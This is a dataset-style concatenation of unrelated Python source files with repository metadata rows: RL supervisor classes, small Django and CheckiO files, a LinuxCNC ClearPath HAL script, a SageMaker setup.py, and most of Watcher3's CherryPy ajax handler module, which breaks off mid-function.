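# expert policies: a deterministic act fn, a tf policy_fn with its session, and an act fn
# that takes a stochastic flag as its first argument.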
class Supervisor():
def __init__(self, act):
self.act = act
def sample_action(self, s):
return self.intended_action(s)
def intended_action(self, s):
action = self.act(s[None], stochastic=False)[0]
return action
class Supervisor2():
def __init__(self, policy_fn, sess):
self.policy_fn = policy_fn
self.sess = sess
with self.sess.as_default():
tf_util.initialize()
def sample_action(self, s):
with self.sess.as_default():
intended_action = self.policy_fn(s[None,:])[0]
return intended_action
def intended_action(self, s):
return self.sample_action(s)
class Supervisor3():
def __init__(self, act):
self.act = act
def sample_action(self, s):
return self.intended_action(s)
def intended_action(self, s):
action = self.act(False, s)[0]
return action
| [
"[email protected]"
]
| |
285bb70b43f6c87ac58cc9c0d7d50b7983f5ac64 | 8b57df3640fd9a726a8729c051dc27dbaee16059 | /notify/apps.py | 985c0feae7a585b8cbecad503a2120d658c0dc2f | []
| no_license | sinjorjob/django-notification-function | 86678df54e12b58a2feb315f10fde585412a2029 | 15ba6111474641498dbcd83ea0bd06d40b348387 | refs/heads/master | 2023-05-31T13:41:26.147761 | 2021-06-26T07:05:31 | 2021-06-26T07:05:31 | 380,437,265 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 150 | py | from django.apps import AppConfig
class NotifyConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'notify'
| [
"[email protected]"
]
| |
09ac2327168508b61c167a4490edbc965fda67e3 | 7a55d3fac2bc2b7afd46300182944d3cb1b8a370 | /clearpath/clearpath | a0265890c276994cb6ac2240c003f7c7a579b66e | []
| no_license | btownshend/CNCConfig | 5d3eca22573c0534ce0b5c43a6958c2d5011a992 | bdadea7bacf4c5d373faeab30f31b1d5145fb3d3 | refs/heads/main | 2023-03-16T16:11:44.071625 | 2021-03-14T22:08:10 | 2021-03-14T22:08:10 | 329,538,393 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,415 | #!/usr/bin/env python
import ctypes
import hal, time
import sys,os
print('sys.argv[0] =', sys.argv[0])
pathname = os.path.dirname(sys.argv[0])
print('path =', pathname)
lib=ctypes.CDLL(pathname+"/getstatus.so")
print('getstatus.so loaded')
h=hal.component("clearpath")
h.newpin("0.fault",hal.HAL_BIT,hal.HAL_OUT)
h.newpin("1.fault",hal.HAL_BIT,hal.HAL_OUT)
h.newpin("0.enable",hal.HAL_BIT,hal.HAL_IN)
h.newpin("1.enable",hal.HAL_BIT,hal.HAL_IN)
print('components/pins created')
try:
if lib.initialize() < 0:
print("Unable to initialize ClearPath SC-HUB connection")
raise SystemExit
print("initialized")
print(dir(h))
h.ready()
print("ready")
while True:
time.sleep(0.25)
#print("update")
if lib.setenable(0,h['0.enable']) < 0:
print("clearpath: failed to setenable for port 0")
h['0.fault']=1
continue
if lib.setenable(1,h['1.enable']) < 0:
print("clearpath: failed to setenable for port 1")
h['1.fault']=1
continue
s0=lib.getstatus(0)
if s0<0:
print("clearpath: getstatus(0) failed")
h['0.fault']=(s0!=0)
s1=lib.getstatus(1)
if s1<0:
print("clearpath: getstatus(1) failed")
h['1.fault']=(s1!=0)
except KeyboardInterrupt:
lib.shutdown()
raise SystemExit
| [
"[email protected]"
]
| ||
fe52b2cd35017acf657af7d8ab0cb4f759250d7a | 0e08e9873549c514245842c5f4ad01769e1c76d6 | /myblog/blog/tests.py | ec7bc624daecb07dd9bc9025f52c0c33afa1036c | []
| no_license | liangxs0/Django_study | 39afe9c889467eb81e2ecdcee4e285c2bd27d28a | 2f509bce6cdaaee288c37a603978a96ffc43f0e4 | refs/heads/main | 2023-04-25T20:30:05.275066 | 2021-05-31T03:27:24 | 2021-05-31T03:27:24 | 372,365,793 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 569 | py | # from django.test import TestCase
# #
#
# from django.contrib.auth.hashers import make_password, check_password
# # # Create your tests here.
# x = make_password("123", 'abc', 'pbkdf2_sha256')
# y = make_password("123", 'abc', 'pbkdf2_sha256')
# print(x)
# print(y)
def a(nums):
nums = [str(n) for n in nums]
n_nums = []
for n in nums:
for nn in n:
n_nums.append(nn)
print(n_nums)
n_nums.sort(reverse=True)
print(n_nums)
res = ''
for n in n_nums:
res+=n
return res
c = "".join([3,30,34,5,9])
print(c) | [
"[email protected]"
]
| |
807b8f72c43040317da699074158ef426c15575e | 6bb45c5892b4c9692dcc44116fb73dc9e7ab90ff | /advanced_functionality/autogluon-sagemaker-pipeline/setup.py | 56a675d8c0cac3a064199a11bd56e8e1316b0dce | [
"Apache-2.0",
"BSD-2-Clause"
]
| permissive | aws/amazon-sagemaker-examples | 8359afe544e873662bda5b8d2b07399c437213c9 | 43dae4b28531cde167598f104f582168b0a4141f | refs/heads/main | 2023-08-26T04:42:52.342776 | 2023-08-25T14:37:19 | 2023-08-25T14:37:19 | 107,937,815 | 4,797 | 3,519 | Apache-2.0 | 2023-09-14T19:47:03 | 2017-10-23T05:55:22 | Jupyter Notebook | UTF-8 | Python | false | false | 1,569 | py | import os
import setuptools
about = {}
here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, "pipelines", "__version__.py")) as f:
exec(f.read(), about)
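# pipelines/__version__.py is expected to define __title__, __description__, __version__,
# __author__, __author_email__, __url__ and __license__, which are loaded into `about`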
with open("README.md", "r") as f:
readme = f.read()
required_packages = ["sagemaker"]
extras = {
"test": [
"black",
"coverage",
"flake8",
"mock",
"pydocstyle",
"pytest",
"pytest-cov",
"sagemaker",
"tox",
]
}
setuptools.setup(
name=about["__title__"],
description=about["__description__"],
version=about["__version__"],
author=about["__author__"],
author_email=["__author_email__"],
long_description=readme,
long_description_content_type="text/markdown",
url=about["__url__"],
license=about["__license__"],
packages=setuptools.find_packages(),
include_package_data=True,
python_requires=">=3.6",
install_requires=required_packages,
extras_require=extras,
entry_points={
"console_scripts": [
"get-pipeline-definition=pipelines.get_pipeline_definition:main",
"run-pipeline=pipelines.run_pipeline:main",
]
},
classifiers=[
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"Natural Language :: English",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
],
)
| [
"[email protected]"
]
| |
55f2794ab24a2c74169da65c168ce04bb3914a86 | 384a612001a5fdd5d089898f13cc7aef3b954a6e | /coupons/models.py | a70532afc380b7291804bb0f539e35ea14a9e0e6 | []
| no_license | purum01/test_django_onlineshop | f3a9c4d12d4077ea69cb9ad372e5acc5243379b7 | c4a40a273a512c939a364bee91bab950559d0f87 | refs/heads/main | 2023-06-14T12:11:05.614611 | 2021-07-03T14:34:01 | 2021-07-03T14:34:01 | 380,695,829 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 442 | py | from django.db import models
from django.core.validators import MinValueValidator, MaxValueValidator
class Coupon(models.Model):
code = models.CharField(max_length=50, unique=True)
valid_from = models.DateTimeField()
valid_to = models.DateTimeField()
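# discount is a whole-number percentage, constrained to 0-100 by the validators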
discount = models.IntegerField(validators=[MinValueValidator(0),MaxValueValidator(100)])
active = models.BooleanField()
def __str__(self):
return self.code
| [
"[email protected]"
]
| |
64ca497be5be743de5dd8bc59793c84cf3431d4f | 18c6f7ee10526583d8c65acc5ce04579a91fdeeb | /ch_01/18.tuple.py | cd04da0d3333b776026f7697790ddcee7dacff23 | []
| no_license | cloudsecuritylabs/pythonProject_1 | 97273634df25e306d0a2aed56fcf5c836d2ac33c | 8fc0d17b549d7195f8de46a227e5bb5d9f2ed4ed | refs/heads/master | 2023-07-22T16:06:14.550571 | 2021-08-24T03:09:00 | 2021-08-24T03:09:00 | 399,319,867 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 175 | py | '''
Let's learn about tuple
'''
# tuple is immutable
my_tup = ('cat', 'dog', 'horse')
# NoneType
my_tup = []
food = None
if food is None:
print("Hey give me something") | [
"[email protected]"
]
| |
29aaf9830413dce680cb164b3a8dd63745dd68af | 1572b7dea50699582879b2b9fcedef12f2ef6704 | /verification/src/referee.py | 26e014f1e115a5887f39fd778b5563bcb03c8beb | []
| no_license | khanukov/checkio-empire-broken-report | 7106869fc504a2551fb7a1d412245a74c9401f64 | 64d68d89b99c2116c12fd1d579961ab699a760c6 | refs/heads/master | 2020-12-03T02:19:33.174438 | 2015-04-07T14:12:08 | 2015-04-07T14:12:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 452 | py | from checkio_referee import RefereeCodeGolf
from checkio_referee import covercodes
import settings_env
from tests import TESTS
# TODO Golf
class Referee(RefereeCodeGolf):
DEFAULT_MAX_CODE_LENGTH = 150
BASE_POINTS = 15
TESTS = TESTS
ENVIRONMENTS = settings_env.ENVIRONMENTS
DEFAULT_FUNCTION_NAME = "golf"
ENV_COVERCODE = {
"python_2": covercodes.py_2_str,
"python_3": None,
"javascript": None
}
| [
"[email protected]"
]
| |
ccee78a2b9646c3ed52024216b909a64eb921b0c | e4aab0a71dc5c047d8b1576380b16364e03e7c0d | /core/ajax.py | 0d38f835124b1bb6fdc17e253409ede47b76fd44 | [
"Apache-2.0"
]
| permissive | Joecastra/Watcher3 | 8ca66c44846030f0eb771d9d6ddeb9c37f637a4e | ce25d475f83ed36d6772f0cc35ef020d5e47c94b | refs/heads/master | 2021-01-19T11:05:55.454351 | 2017-04-10T20:17:24 | 2017-04-10T20:17:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 39,761 | py | import json
import logging
import os
import sys
import threading
import cherrypy
from base64 import b16encode
import core
from core import config, library, plugins, poster, searchresults, searcher, snatcher, sqldb, version
from core.providers import torrent, newznab
from core.downloaders import nzbget, sabnzbd, transmission, qbittorrent, deluge, rtorrent
from core.movieinfo import TMDB
from core.notification import Notification
from core.helpers import Conversions
from core.rss import predb
from templates import movie_info_popup, import_library, movie_status_popup, plugin_conf_popup, status
logging = logging.getLogger(__name__)
class Ajax(object):
''' These are all the methods that handle
ajax post/get requests from the browser.
Except in special circumstances, all should return a JSON string
since that is the only datatype sent over http
'''
def __init__(self):
self.tmdb = TMDB()
self.config = config.Config()
self.metadata = library.Metadata()
self.predb = predb.PreDB()
self.plugins = plugins.Plugins()
self.searcher = searcher.Searcher()
self.score = searchresults.Score()
self.sql = sqldb.SQL()
self.library = library
self.poster = poster.Poster()
self.snatcher = snatcher.Snatcher()
self.update = library.Status()
@cherrypy.expose
def search_tmdb(self, search_term):
''' Search tmdb for movies
:param search_term: str title and year of movie (Movie Title 2016)
Returns str json-encoded list of dicts that contain tmdb's data.
'''
results = self.tmdb.search(search_term)
if not results:
logging.info('No Results found for {}'.format(search_term))
return None
else:
return json.dumps(results)
@cherrypy.expose
def movie_info_popup(self, data):
''' Calls movie_info_popup to render html
:param imdbid: str imdb identification number (tt123456)
Returns str html content.
'''
mip = movie_info_popup.MovieInfoPopup()
return mip.html(data)
@cherrypy.expose
def movie_status_popup(self, imdbid):
''' Calls movie_status_popup to render html
:param imdbid: str imdb identification number (tt123456)
Returns str html content.
'''
msp = movie_status_popup.MovieStatusPopup()
return msp.html(imdbid)
@cherrypy.expose
def add_wanted_movie(self, data, full_metadata=False):
''' Adds movie to Wanted list.
:param data: str json.dumps(dict) of info to add to database.
full_metadata: bool if data is complete and ready for write
data MUST include tmdb id as data['id']
Writes data to MOVIES table.
If full_metadata is False, searches tmdb for data['id'] and updates data
If Search on Add enabled,
searches for movie immediately in separate thread.
If Auto Grab enabled, will snatch movie if found.
Returns str json.dumps(dict) of status and message
'''
def thread_search_grab(data):
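# runs in a background thread after the movie is written: verify the release against
# predb, then optionally search providers and auto-grab if enabled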
imdbid = data['imdbid']
title = data['title']
year = data['year']
quality = data['quality']
self.predb.check_one(data)
if core.CONFIG['Search']['searchafteradd']:
if self.searcher.search(imdbid, title, year, quality):
if core.CONFIG['Search']['autograb']:
self.snatcher.auto_grab(data)
response = {}
data = json.loads(data)
tmdbid = data['id']
if not full_metadata:
movie = self.tmdb._search_tmdbid(tmdbid)[0]
movie.update(data)
else:
movie = data
movie['quality'] = data.get('quality', 'Default')
movie['status'] = data.get('status', 'Wanted')
if self.sql.row_exists('MOVIES', imdbid=movie['imdbid']):
logging.info('{} already exists in library.'.format(movie['title']))
response['response'] = False
response['error'] = '{} already exists in library.'.format(movie['title'])
return json.dumps(response)
if movie.get('poster_path'):
poster_url = 'http://image.tmdb.org/t/p/w300{}'.format(movie['poster_path'])
else:
poster_url = '{}/static/images/missing_poster.jpg'.format(core.PROG_PATH)
movie = self.metadata.convert_to_db(movie)
if self.sql.write('MOVIES', movie):
t2 = threading.Thread(target=self.poster.save_poster, args=(movie['imdbid'], poster_url))
t2.start()
if movie['status'] != 'Disabled': # disable immediately grabbing new release for imports
t = threading.Thread(target=thread_search_grab, args=(movie,))
t.start()
response['response'] = True
response['message'] = '{} {} added to library.'.format(movie['title'], movie['year'])
self.plugins.added(movie['title'], movie['year'], movie['imdbid'], movie['quality'])
return json.dumps(response)
else:
response['response'] = False
response['error'] = 'Could not write to database. Check logs for more information.'
return json.dumps(response)
@cherrypy.expose
def add_wanted_imdbid(self, imdbid, quality='Default'):
''' Method to quickly add movie with just imdbid
:param imdbid: str imdb id #
Submits movie with base quality options
Generally just used for the api
Returns dict of success/fail with message.
Returns str json.dumps(dict)
'''
response = {}
movie = self.tmdb._search_imdbid(imdbid)
if not movie:
response['status'] = 'false'
response['message'] = '{} not found on TMDB.'.format(imdbid)
return response
else:
movie = movie[0]
movie['imdbid'] = imdbid
movie['quality'] = quality
return self.add_wanted_movie(json.dumps(movie))
@cherrypy.expose
def add_wanted_tmdbid(self, tmdbid, quality='Default'):
''' Method to quickly add movie with just tmdbid
:param tmdbid: str tmdb id #
Submits movie with base quality options
Generally just used for the api
Returns dict of success/fail with message.
Returns str json.dumps(dict)
'''
response = {}
data = self.tmdb._search_tmdbid(tmdbid)
if not data:
response['status'] = 'false'
response['message'] = '{} not found on TMDB.'.format(tmdbid)
return response
else:
data = data[0]
data['quality'] = quality
data['status'] = 'Wanted'
return self.add_wanted_movie(json.dumps(data))
@cherrypy.expose
def save_settings(self, data):
''' Saves settings to config file
:param data: dict of Section with nested dict of keys and values:
{'Section': {'key': 'val', 'key2': 'val2'}, 'Section2': {'key': 'val'}}
All dicts must contain the full tree or data will be lost.
Fires off additional methods if necessary.
Returns json.dumps(dict)
'''
# orig_config = dict(core.CONFIG)
logging.info('Saving settings.')
data = json.loads(data)
save_data = {}
for key in data:
if data[key] != core.CONFIG[key]:
save_data[key] = data[key]
if not save_data:
return json.dumps({'response': True})
try:
self.config.write_dict(save_data)
except (SystemExit, KeyboardInterrupt):
raise
except Exception as e: # noqa
logging.error('Writing config.', exc_info=True)
return json.dumps({'response': False, 'error': 'Unable to write to config file.'})
return json.dumps({'response': True})
@cherrypy.expose
def remove_movie(self, imdbid):
''' Removes movie
:param imdbid: str imdb identification number (tt123456)
Removes row from MOVIES, removes any entries in SEARCHRESULTS
In separate thread deletes poster image.
Returns str json.dumps(dict) of success/fail status
'''
t = threading.Thread(target=self.poster.remove_poster, args=(imdbid,))
t.start()
if self.sql.remove_movie(imdbid):
response = {'response': True}
else:
response = {'response': False}
return json.dumps(response)
@cherrypy.expose
def search(self, imdbid, title, year, quality):
''' Search indexers for specific movie.
:param imdbid: str imdb identification number (tt123456)
:param title: str movie title and year
Checks predb, then, if found, starts searching providers for movie.
Does not return
'''
self.searcher.search(imdbid, title, year, quality)
return
@cherrypy.expose
def manual_download(self, title, year, guid, kind):
''' Sends search result to downloader manually
:param guid: str download link for nzb/magnet/torrent file.
:param kind: str type of download (torrent, magnet, nzb)
Returns str json.dumps(dict) success/fail message
'''
torrent_enabled = core.CONFIG['Downloader']['Sources']['torrentenabled']
usenet_enabled = core.CONFIG['Downloader']['Sources']['usenetenabled']
if kind == 'nzb' and not usenet_enabled:
return json.dumps({'response': False, 'error': 'Link is NZB but no Usenet downloader is enabled.'})
elif kind in ('torrent', 'magnet') and not torrent_enabled:
return json.dumps({'response': False, 'error': 'Link is {} but no Torrent downloader is enabled.'.format(kind)})
data = dict(self.sql.get_single_search_result('guid', guid))
if data:
data['year'] = year
return json.dumps(self.snatcher.snatch(data))
else:
return json.dumps({'response': False, 'error': 'Unable to get download information from the database. Check logs for more information.'})
@cherrypy.expose
def mark_bad(self, guid, imdbid):
''' Marks guid as bad in SEARCHRESULTS and MARKEDRESULTS
:param guid: str guid to mark
Returns str json.dumps(dict)
'''
if self.update.mark_bad(guid, imdbid=imdbid):
response = {'response': True, 'message': 'Marked as Bad.'}
else:
response = {'response': False, 'error': 'Could not mark release as bad. Check logs for more information.'}
return json.dumps(response)
@cherrypy.expose
def notification_remove(self, index):
''' Removes notification from core.notification
:param index: str or unicode index of notification to remove
'index' will be a type of string since it comes from ajax request.
Therefore we convert to int here before passing to Notification
Simply calls Notification module.
Does not return
'''
Notification.remove(int(index))
return
@cherrypy.expose
def update_check(self):
''' Manually check for updates
Returns str json.dumps(dict) from Version manager update_check()
'''
response = version.Version().manager.update_check()
return json.dumps(response)
@cherrypy.expose
def refresh_list(self, list, imdbid='', quality=''):
''' Re-renders html for Movies/Results list
:param list: str the html list id to be re-rendered
:param imdbid: str imdb identification number (tt123456) <optional>
Calls template file to re-render a list when modified in the database.
#result_list requires imdbid.
Returns str html content.
'''
if list == '#movie_list':
return status.Status.movie_list()
if list == '#result_list':
return movie_status_popup.MovieStatusPopup().result_list(imdbid, quality)
@cherrypy.expose
def test_downloader_connection(self, mode, data):
''' Test connection to downloader.
:param mode: str which downloader to test.
:param data: dict connection information (url, port, login, etc)
Executes staticmethod in the chosen downloader's class.
Returns str json.dumps dict:
{'status': 'false', 'message': 'this is a message'}
'''
response = {}
data = json.loads(data)
if mode == 'sabnzbd':
test = sabnzbd.Sabnzbd.test_connection(data)
if test is True:
response['status'] = True
response['message'] = 'Connection successful.'
else:
response['status'] = False
response['error'] = test
if mode == 'nzbget':
test = nzbget.Nzbget.test_connection(data)
if test is True:
response['status'] = True
response['message'] = 'Connection successful.'
else:
response['status'] = False
response['error'] = test
if mode == 'transmission':
test = transmission.Transmission.test_connection(data)
if test is True:
response['status'] = True
response['message'] = 'Connection successful.'
else:
response['status'] = False
response['error'] = test
if mode == 'delugerpc':
test = deluge.DelugeRPC.test_connection(data)
if test is True:
response['status'] = True
response['message'] = 'Connection successful.'
else:
response['status'] = False
response['error'] = test
if mode == 'delugeweb':
test = deluge.DelugeWeb.test_connection(data)
if test is True:
response['status'] = True
response['message'] = 'Connection successful.'
else:
response['status'] = False
response['error'] = test
if mode == 'qbittorrent':
test = qbittorrent.QBittorrent.test_connection(data)
if test is True:
response['status'] = True
response['message'] = 'Connection successful.'
else:
response['status'] = False
response['error'] = test
if mode == 'rtorrentscgi':
test = rtorrent.rTorrentSCGI.test_connection(data)
if test is True:
response['status'] = True
response['message'] = 'Connection successful.'
else:
response['status'] = False
response['error'] = test
if mode == 'rtorrenthttp':
test = rtorrent.rTorrentHTTP.test_connection(data)
if test is True:
response['status'] = True
response['message'] = 'Connection successful.'
else:
response['status'] = False
response['error'] = test
return json.dumps(response)
@cherrypy.expose
def server_status(self, mode):
''' Check or modify status of CherryPy server_status
:param mode: str command or request of state
Restarts or Shuts Down server in separate thread.
Delays by one second to allow browser to redirect.
If mode == 'online', asks server for status.
(ENGINE.started, ENGINE.stopped, etc.)
Returns nothing for mode == restart || shutdown
Returns str server state if mode == online
'''
def server_restart():
cwd = os.getcwd()
cherrypy.engine.restart()
os.chdir(cwd) # again, for the daemon
return
def server_shutdown():
cherrypy.engine.stop()
cherrypy.engine.exit()
sys.exit(0)
if mode == 'restart':
logging.info('Restarting Server...')
threading.Timer(1, server_restart).start()
return
elif mode == 'shutdown':
logging.info('Shutting Down Server...')
threading.Timer(1, server_shutdown).start()
return
elif mode == 'online':
return str(cherrypy.engine.state)
@cherrypy.expose
def update_now(self, mode):
''' Starts and executes update process.
:param mode: str 'set_true' or 'update_now'
The ajax response is a generator that will contain
only the success/fail message.
This is done so the message can be passed to the ajax
request in the browser while cherrypy restarts.
'''
response = self._update_now(mode)
for i in response:
return i
@cherrypy.expose
def _update_now(self, mode):
''' Starts and executes update process.
:param mode: str 'set_true' or 'update_now'
Helper for self.update_now()
If mode == set_true, sets core.UPDATING to True
This is done so if the user visits /update without setting true
they will be redirected back to status.
Yields 'true' back to browser
If mode == 'update_now', starts update process.
Yields 'true' or 'failed'. If true, restarts server.
'''
if mode == 'set_true':
core.UPDATING = True
yield json.dumps({'response': True})
if mode == 'update_now':
update_status = version.Version().manager.execute_update()
core.UPDATING = False
if update_status is False:
logging.error('Update Failed.')
yield json.dumps({'response': False})
elif update_status is True:
yield json.dumps({'response': True})
logging.info('Respawning process...')
cherrypy.engine.stop()
python = sys.executable
os.execl(python, python, *sys.argv)
else:
return
@cherrypy.expose
def update_movie_options(self, quality, status, imdbid):
''' Updates quality settings for individual title
:param quality: str name of new quality
:param status: str status management state
:param imdbid: str imdb identification number
'''
logging.info('Updating quality profile to {} for {}.'.format(quality, imdbid))
if not self.sql.update('MOVIES', 'quality', quality, 'imdbid', imdbid):
return json.dumps({'response': False})
logging.info('Updating status to {} for {}.'.format(status, imdbid))
if status == 'Automatic':
if not self.update.movie_status(imdbid):
return json.dumps({'response': False})
elif status == 'Finished':
if not self.sql.update('MOVIES', 'status', 'Disabled', 'imdbid', imdbid):
return json.dumps({'response': False})
return json.dumps({'response': True})
@cherrypy.expose
def get_log_text(self, logfile):
with open(os.path.join(core.LOG_DIR, logfile), 'r') as f:
log_text = ''.join(reversed(f.readlines()))
return log_text
@cherrypy.expose
def indexer_test(self, indexer, apikey, mode):
if mode == 'newznab':
return json.dumps(newznab.NewzNab.test_connection(indexer, apikey))
elif mode == 'torznab':
return json.dumps(torrent.Torrent.test_connection(indexer, apikey))
else:
return json.dumps({'response': 'false', 'error': 'Invalid test mode.'})
@cherrypy.expose
def get_plugin_conf(self, folder, conf):
''' Calls plugin_conf_popup to render html
folder: str folder to read config file from
conf: str filename of config file (ie 'my_plugin.conf')
Returns str html content.
'''
return plugin_conf_popup.PluginConfPopup.html(folder, conf)
@cherrypy.expose
def save_plugin_conf(self, folder, conf, data):
''' Calls plugin_conf_popup to render html
folder: str folder to store config file
conf: str filename of config file (ie 'my_plugin.conf')
data: str json data to store in conf file
Returns str json dumps dict of success/fail message
'''
data = json.loads(data)
conf_file = os.path.join(core.PROG_PATH, core.PLUGIN_DIR, folder, conf)
response = {'response': True, 'message': 'Plugin settings saved'}
try:
with open(conf_file, 'w') as output:
json.dump(data, output, indent=2)
except Exception as e:
response = {'response': False, 'error': str(e)}
return json.dumps(response)
@cherrypy.expose
def scan_library_directory(self, directory, minsize, recursive):
''' Calls library to scan directory for movie files
directory: str directory to scan
minsize: str minimum file size in mb, coerced to int
recursive: str 'true' or 'false', coerced to bool
Removes all movies already in library.
If error, yields {'error': reason} and stops Iteration
If movie has all metadata, yields:
{'complete': {<metadata>}}
If missing imdbid or resolution, yields:
{'incomplete': {<known metadata>}}
All metadata dicts include:
'path': 'absolute path to file'
'progress': '10 of 250'
Yields generator object of json objects
'''
recursive = json.loads(recursive)
minsize = int(minsize)
files = self.library.ImportDirectory.scan_dir(directory, minsize, recursive)
if files.get('error'):
yield json.dumps({'error': files['error']})
raise StopIteration()
library = [i['imdbid'] for i in self.sql.get_user_movies()]
files = files['files']
length = len(files)
for index, path in enumerate(files):
metadata = self.metadata.get_metadata(path)
metadata['size'] = os.path.getsize(path)
metadata['finished_file'] = path
metadata['human_size'] = Conversions.human_file_size(metadata['size'])
progress = [index + 1, length]
if not metadata.get('imdbid'):
logging.info('IMDB unknown for import {}'.format(metadata['title']))
yield json.dumps({'response': 'incomplete', 'movie': metadata, 'progress': progress})
continue
if metadata['imdbid'] in library:
logging.info('Import {} already in library, ignoring.'.format(metadata['title']))
yield json.dumps({'response': 'in_library', 'movie': metadata, 'progress': progress})
continue
elif not metadata.get('resolution'):
logging.info('Resolution/Source unknown for import {}'.format(metadata['title']))
yield json.dumps({'response': 'incomplete', 'movie': metadata, 'progress': progress})
continue
else:
logging.info('All data found for import {}'.format(metadata['title']))
yield json.dumps({'response': 'complete', 'movie': metadata, 'progress': progress})
scan_library_directory._cp_config = {'response.stream': True}
@cherrypy.expose
def import_dir(self, movie_data, corrected_movies):
''' Imports list of movies in data
movie_data: list of dicts of movie info ready to import
corrected_movies: list of dicts of user-corrected movie info
corrected_movies must be [{'/path/to/file': {'known': 'metadata'}}]
Iterates through corrected_movies and attempts to get metadata again if required.
If imported, generates and stores fake search result.
Creates dict {'success': [], 'failed': []} and
appends movie data to the appropriate list.
Yields generator object of json objects
'''
movie_data = json.loads(movie_data)
corrected_movies = json.loads(corrected_movies)
fake_results = []
success = []
length = len(movie_data) + len(corrected_movies)
progress = 1
if corrected_movies:
for data in corrected_movies:
tmdbdata = self.tmdb._search_imdbid(data['imdbid'])[0]
if tmdbdata:
data['year'] = tmdbdata['release_date'][:4]
data.update(tmdbdata)
movie_data.append(data)
else:
logging.error('Unable to find {} on TMDB.'.format(data['imdbid']))
yield json.dumps({'response': False, 'movie': data, 'progress': [progress, length], 'reason': 'Unable to find {} on TMDB.'.format(data['imdbid'])})
progress += 1
for movie in movie_data:
if movie['imdbid']:
movie['status'] = 'Disabled'
response = json.loads(self.add_wanted_movie(json.dumps(movie)))
if response['response'] is True:
fake_results.append(searchresults.generate_simulacrum(movie))
yield json.dumps({'response': True, 'progress': [progress, length], 'movie': movie})
progress += 1
success.append(movie)
continue
else:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'reason': response['error']})
progress += 1
continue
else:
logging.error('Unable to find {} on TMDB.'.format(movie['imdbid']))
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'reason': 'IMDB ID invalid or missing.'})
progress += 1
fake_results = self.score.score(fake_results, imported=True)
for i in success:
score = None
for r in fake_results:
if r['imdbid'] == i['imdbid']:
score = r['score']
break
if score:
self.sql.update('MOVIES', 'finished_score', score, 'imdbid', i['imdbid'])
self.sql.write_search_results(fake_results)
import_dir._cp_config = {'response.stream': True}
@cherrypy.expose
def list_files(self, current_dir, move_dir):
''' Lists files in directory
current_dir: str base path
move_dir: str child path to read
Joins and normalizes paths:
('/home/user/movies', '..')
Becomes /home/user
Sends path to import_library template to generate html
Returns json dict {'new_path': '/path', 'html': '<li>...'}
'''
response = {}
new_path = os.path.normpath(os.path.join(current_dir, move_dir))
response['new_path'] = new_path
try:
response['html'] = import_library.ImportLibrary.file_list(new_path)
except Exception as e:
response = {'error': str(e)}
logging.error('Error listing directory.', exc_info=True)
return json.dumps(response)
@cherrypy.expose
def update_metadata(self, imdbid):
tmdbid = self.sql.get_movie_details('imdbid', imdbid).get('tmdbid')
if not tmdbid:
tmdbid = self.tmdb._search_imdbid(imdbid)[0].get('id')
if not tmdbid:
return json.dumps({'response': False, 'error': 'Unable to find {} on TMDB.'.format(imdbid)})
movie = self.tmdb._search_tmdbid(tmdbid)[0]
target_poster = os.path.join(self.poster.poster_folder, '{}.jpg'.format(imdbid))
if movie['poster_path']:
poster_url = 'http://image.tmdb.org/t/p/w300{}'.format(movie['poster_path'])
else:
poster_url = '{}/static/images/missing_poster.jpg'.format(core.PROG_PATH)
if os.path.isfile(target_poster):
try:
os.remove(target_poster)
except Exception as e: #noqa
logging.warning('Unable to remove existing poster.', exc_info=True)
return json.dumps({'response': False, 'error': 'Unable to remove existing poster.'})
movie = self.metadata.convert_to_db(movie)
self.sql.update_multiple('MOVIES', movie, imdbid=imdbid)
self.poster.save_poster(imdbid, poster_url)
return json.dumps({'response': True, 'message': 'Metadata updated.'})
@cherrypy.expose
def change_quality_profile(self, profiles, imdbid=None):
''' Updates quality profile name
profiles: dict of profile names. k:v is currentname:newname
imdbid: str imdbid of movie to change <default None>
Changes movie quality profiles from k in names to v in names
If imdbid is passed will change only one movie, otherwise changes
all movies where profile == k
If imdbid is passed and names contains more than one k:v pair, submits changes
using v from the first dict entry. This is unreliable, so just submit one.
Executes two loops.
First changes qualities to temporary value.
Then changes tmp values to target values.
This way you can swap two names without them all becoming one.
'''
profiles = json.loads(profiles)
if imdbid:
q = list(profiles.values())[0]
if not self.sql.update('MOVIES', 'quality', q, 'imdbid', imdbid):
return json.dumps({'response': False, 'error': 'Unable to update {} to quality {}'.format(imdbid, q)})
else:
return json.dumps({'response': True, 'Message': '{} changed to {}'.format(imdbid, q)})
else:
tmp_qualities = {}
for k, v in profiles.items():
q = b16encode(v.encode('ascii')).decode('ascii')
if not self.sql.update('MOVIES', 'quality', q, 'quality', k):
return json.dumps({'response': False, 'error': 'Unable to change {} to temporary quality {}'.format(k, q)})
else:
tmp_qualities[q] = v
for k, v in tmp_qualities.items():
if not self.sql.update('MOVIES', 'quality', v, 'quality', k):
return json.dumps({'response': False, 'error': 'Unable to change temporary quality {} to {}'.format(k, v)})
if not self.sql.update('MOVIES', 'backlog', 0, 'quality', k):
return json.dumps({'response': False, 'error': 'Unable to set backlog flag. Manual backlog search required for affected titles.'})
return json.dumps({'response': True, 'message': 'Quality profiles updated.'})
@cherrypy.expose
def get_kodi_movies(self, url):
''' Gets list of movies from kodi server
url: str url of kodi server
Calls Kodi import method to gather list.
Returns list of dicts of movies
'''
return json.dumps(library.ImportKodiLibrary.get_movies(url))
@cherrypy.expose
def import_kodi(self, movies):
''' Imports list of movies in movies from Kodi library
movie_data: JSON list of dicts of movies
Iterates through movies and gathers all required metadata.
If imported, generates and stores fake search result.
Creates dict {'success': [], 'failed': []} and
appends movie data to the appropriate list.
Yields generator object of json objects
'''
movies = json.loads(movies)
fake_results = []
success = []
length = len(movies)
progress = 1
print(movies[0])
for movie in movies:
